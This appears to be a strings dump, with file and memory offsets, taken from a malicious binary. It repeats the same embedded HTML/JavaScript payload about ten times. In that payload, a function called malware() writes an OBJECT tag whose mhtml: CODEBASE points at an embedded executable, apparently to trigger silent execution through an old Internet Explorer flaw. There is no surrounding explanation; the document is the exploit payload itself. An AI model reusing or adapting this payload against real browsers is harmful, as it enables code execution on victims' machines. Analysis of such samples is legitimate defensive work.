00006E42 00406E42 0 setTimeout("malware()",150)
00006E5F 00406E5F 0 </script><body bgcolor=black scroll=no>
00006E87 00406E87 0 <SCRIPT>
00006E90 00406E90 0 function malware()
00006EA5 00406EA5 0 s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
00006EDB 00406EDB 0 path=unescape(path);
00006EF0 00406EF0 0 document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')
0000705A 0040705A 0 setTimeout("malware()",150)
00007077 00407077 0 </script><body bgcolor=black scroll=no>
0000709F 0040709F 0 <SCRIPT>
000070A8 004070A8 0 function malware()
000070BD 004070BD 0 s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
000070F3 004070F3 0 path=unescape(path);
00007108 00407108 0 document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')
00007272 00407272 0 setTimeout("malware()",150)
0000728F 0040728F 0 </script><body bgcolor=black scroll=no>
000072B7 004072B7 0 <SCRIPT>
000072C0 004072C0 0 function malware()
000072D5 004072D5 0 s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
0000730B 0040730B 0 path=unescape(path);
00007320 00407320 0 document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')
0000748A 0040748A 0 setTimeout("malware()",150)
000074A7 004074A7 0 </script><body bgcolor=black scroll=no>
000074CF 004074CF 0 <SCRIPT>
000074D8 004074D8 0 function malware()
000074ED 004074ED 0 s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
00007523 00407523 0 path=unescape(path);
00007538 00407538 0 document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')
000076A2 004076A2 0 setTimeout("malware()",150)
000076BF 004076BF 0 </script><body bgcolor=black scroll=no>
000076E7 004076E7 0 <SCRIPT>
000076F0 004076F0 0 function malware()
00007705 00407705 0 s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
0000773B 0040773B 0 path=unescape(path);
00007750 00407750 0 document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')
000078BA 004078BA 0 setTimeout("malware()",150)
000078D7 004078D7 0 </script><body bgcolor=black scroll=no>
000078FF 004078FF 0 <SCRIPT>
00007908 00407908 0 function malware()
File pos Mem pos ID Text
======== ======= == ====
0000791D 0040791D 0 s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
00007953 00407953 0 path=unescape(path);
00007968 00407968 0 document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')
00007AD2 00407AD2 0 setTimeout("malware()",150)
00007AEF 00407AEF 0 </script><body bgcolor=black scroll=no>
00007B17 00407B17 0 <SCRIPT>
00007B20 00407B20 0 function malware()
00007B35 00407B35 0 s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
00007B6B 00407B6B 0 path=unescape(path);
00007B80 00407B80 0 document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')
00007CEA 00407CEA 0 setTimeout("malware()",150)
00007D07 00407D07 0 </script><body bgcolor=black scroll=no>
00007D2F 00407D2F 0 <SCRIPT>
00007D38 00407D38 0 function malware()
00007D4D 00407D4D 0 s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
00007D83 00407D83 0 path=unescape(path);
00007D98 00407D98 0 document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')
00007F02 00407F02 0 setTimeout("malware()",150)
00007F1F 00407F1F 0 </script><body bgcolor=black scroll=no>
00007F47 00407F47 0 <SCRIPT>
00007F50 00407F50 0 function malware()
00007F65 00407F65 0 s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
00007F9B 00407F9B 0 path=unescape(path);
00007FB0 00407FB0 0 document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')
0000811A 0040811A 0 setTimeout("malware()",150)
00008137 00408137 0 </script><body bgcolor=black scroll=no>
0000815F 0040815F 0 <SCRIPT>
00008168 00408168 0 function malware()
0000817D 0040817D 0 s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
000081B3 004081B3 0 path=unescape(path);
000081C8 004081C8 0 document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')
00008332 00408332 0 setTimeout("malware()",150)
0000834F 0040834F 0 </script>
00005715 00474915 0 p value
0000573C 0047493C 0 {9BA05972-F6A8-11CF-A442-00A0C90A8F39}